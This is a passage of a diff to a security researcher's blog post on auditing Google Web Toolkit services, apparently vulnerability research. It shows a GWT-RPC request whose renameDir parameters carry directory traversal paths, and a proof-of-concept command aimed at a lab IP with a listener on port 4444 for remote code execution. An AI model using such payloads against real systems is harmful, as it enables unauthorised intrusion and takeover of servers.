sourceincite/sourceincite.github.io/_posts/2017-04-27-from-serialized-to-shell-auditing-google-web-toolkit.md

 (20) GWT: 6|0|8|https://abc.xyz/some_gwt/|EA595041C3D0ECAA75FAA7D8AAF0DE5A|xx.MIBFileService|renameDir|java.lang.String/2004016611|java.lang.String/2004016611|%s|%s|1|2|3|4|2|5|6|7|8|
 ```

-<p class="cn" markdown="1">The code tells us the parameters, **oldName** and **newName** so my natural instict is to try and attack the endpoint using traversals.
-I didn't even bother looking at the server-side code for this function.</p>
+The code tells us the parameters, **oldName** and **newName** so my natural instict is to try and attack the endpoint using traversals.
+I didn't even bother looking at the server-side code for this function.

 ```
 6|0|8|https://abc.xyz/some_gwt/|EA595041C3D0ECAA75FAA7D8AAF0DE5A|xx.MIBFileService|renameDir|java.lang.String|java.lang.String|../../../../../from_some_folder|../../to_some_other_folder|1|2|3|4|2|5|6|7|8|
 ```

-<p class="cn" markdown="1">After bypassing the authentication using other vulnerabilities, it turns out, I can leverage this to achieve remote code execution against my target.</p>
+After bypassing the authentication using other vulnerabilities, it turns out, I can leverage this to achieve remote code execution against my target.

 ```
 saturn:~ mr_me$ ./poc.py 172.16.175.148 172.16.175.1:4444